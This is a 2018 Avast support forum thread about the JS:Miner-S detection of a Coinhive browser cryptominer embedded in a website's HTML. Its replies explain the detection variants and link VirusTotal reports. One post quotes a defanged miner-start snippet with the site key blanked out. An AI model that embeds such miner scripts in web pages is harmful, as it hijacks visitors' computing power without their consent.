Author Topic: JS:Miner-S  (Read 2841 times)

0 Members and 1 Guest are viewing this topic.

Offline TheOwner

  • Sr. Member
  • ****
  • Posts: 222
JS:Miner-S
« on: April 16, 2018, 05:26:01 PM »
Hello,
Avast block one site and mark it as JS:Miner-S. Athough i know on that site is coinhive miner, i use ublock origin to block it. So why Avast detect it? It is some new version that ublock not block?
Before that it was Miner C now is S, what is difference?
Thank you.

Offline LukasJ

  • Avast team
  • Jr. Member
  • *
  • Posts: 60
Re: JS:Miner-S
« Reply #1 on: April 16, 2018, 05:30:31 PM »
Hi,
Yes, detection JS:Miner-S blocks new coinhive scripts.

Lukas

Offline Pondus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 34655
Re: JS:Miner-S
« Reply #2 on: April 16, 2018, 05:51:46 PM »
Quote
Avast block one site and mark it as JS:Miner-S. Athough i know on that site is coinhive miner, i use ublock origin to block it. So why Avast detect it? It is some new version that ublock not block?
Maybe, or avast webshield read the html code before Ublock


Quote
Before that it was Miner C now is S, what is difference?
Just like cars, there are many variations and all dont come from the same factory   ;)

https://www.fortinet.com/blog/threat-research/the-growing-trend-of-coin-miner-javascript-infection.html


Chief Wiggum: Uh, no, you got the wrong number. This is 9-1…2.


Offline TheOwner

  • Sr. Member
  • ****
  • Posts: 222
Re: JS:Miner-S
« Reply #3 on: April 16, 2018, 06:07:07 PM »
So i found Avast detect miner when i visit that site and tell me miner was found. Strange is when i look what file was blocked, it not block one javascript, it block url of that page, not file.
Also coinhive script  is blocked by ublock origin, if i disable it, avast detect Miner C.
So i dont uderstand what version S means. It not block any single file. It seems Avast trying block known mining sites, but that site work even avast tried block it.

https://urlquery.net/report/1fef71de-7294-4882-b5d0-5af3dda68faa
« Last Edit: April 16, 2018, 07:16:14 PM by TheOwner »

Offline Pondus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 34655
Re: JS:Miner-S
« Reply #4 on: April 16, 2018, 06:09:56 PM »
they may also add url block .... double protection

what URL is it?  post it none clickable

Chief Wiggum: Uh, no, you got the wrong number. This is 9-1…2.


Offline Pondus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 34655
« Last Edit: April 16, 2018, 08:04:55 PM by Pondus »
Chief Wiggum: Uh, no, you got the wrong number. This is 9-1…2.


Offline TheOwner

  • Sr. Member
  • ****
  • Posts: 222
Re: JS:Miner-S
« Reply #6 on: April 16, 2018, 08:07:41 PM »
Sample.txt? Still dont understant what trigger this popup.

Offline Pondus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 34655
Re: JS:Miner-S
« Reply #7 on: April 16, 2018, 08:12:16 PM »
Sample.txt? Still dont understant what trigger this popup.
Website is infected with miner script ... what is strange?

post screenshot of the popup

Chief Wiggum: Uh, no, you got the wrong number. This is 9-1…2.


Offline TheOwner

  • Sr. Member
  • ****
  • Posts: 222
Re: JS:Miner-S
« Reply #8 on: April 16, 2018, 08:14:20 PM »
I know that!  coinhive.com/lib/coinhive.min.js is Miner C. But where you find S version? In which file?

Offline Pondus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 34655
Re: JS:Miner-S
« Reply #9 on: April 16, 2018, 08:16:24 PM »
I know that!  coinhive.com/lib/coinhive.min.js is Miner C. But where you find S version? In which file?
primeassteens.com >> HTML code

Chief Wiggum: Uh, no, you got the wrong number. This is 9-1…2.


Offline TheOwner

  • Sr. Member
  • ****
  • Posts: 222
Re: JS:Miner-S
« Reply #10 on: April 16, 2018, 08:24:20 PM »
Ok i removed  coinhive.com/lib/coinhive.min.js from that html code, tried virustotal again and now is clean. So it is just two detection of that same file.

Offline Pondus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 34655
Re: JS:Miner-S
« Reply #11 on: April 16, 2018, 08:43:46 PM »
The .js file at that location changes, you find many previous versions (different MD5) searching VT

Chief Wiggum: Uh, no, you got the wrong number. This is 9-1…2.


Offline TheOwner

  • Sr. Member
  • ****
  • Posts: 222
Re: JS:Miner-S
« Reply #12 on: April 17, 2018, 03:43:07 PM »
Yes it is possible, but if i go that site without ublock, avast report 2 detections. One C version that marked js. file and S version which marked html code. But when i block that js file by ublock, avast still report me S version even that miner cannot work without that js.

I found S version trigger this script:
(script)
   var miner = new C o i n H i v e. A n  o n y m o u s('XXXXXXXXXXXXXXXXXXXXXXXXX', {
   // threads: X,
   throttle: X,
});
   miner.start();
(/script)
« Last Edit: April 17, 2018, 04:18:03 PM by TheOwner »

Offline TheOwner

  • Sr. Member
  • ****
  • Posts: 222
Re: JS:Miner-S
« Reply #13 on: April 20, 2018, 07:43:46 PM »
Today i no longer see JS:Miner-S detection on that site although that code is still present. I saved html code to .txt file and send to Virustotal and also right clicked that file  -> scan by Avast. Both detect JS:Miner-S but web shield not. When i copied that code here, avast detect too. That means this code is whitelisted on that site?
« Last Edit: April 20, 2018, 07:57:33 PM by TheOwner »

Offline jefferson sant

  • Ultra Poster
  • *****
  • Posts: 5360
  • volunteer
Re: JS:Miner-S
« Reply #14 on: April 23, 2018, 02:01:50 AM »
Hello.

Script is contaminated by all links from primeassteens,not only homepage.

https://www.virustotal.com/#/file/b1a6d6d809bb0ed2c98c286cbc8b36fa0366b2a051cbb384e179685415dbea51/detection

Avast detected JS:Miner-S  blocked is all, if this is not for,the address will connect to the server coinhive as authedmine unnoticed by the user and download i.e 2 variants.

worker-asmjs.min.js

https://www.virustotal.com/#/file/ee374ae08f22d91a92cfcf6b9d8b4cccfd0d57016e9d8fd3af9fbdbd36781b38/detection

coinhive.min[1].js

https://www.virustotal.com/#/file/5d514880ad502302dd4bf0ef8da5d38356385d1c43689f6739f6771ed7a4ef73/detection

JS Miner-C contained the known code Cryptojacking that used,it was modified with a new variant in the site of the coinhive, it is detected as BV:Miner-T [Trj] algoritm new CryptoNight.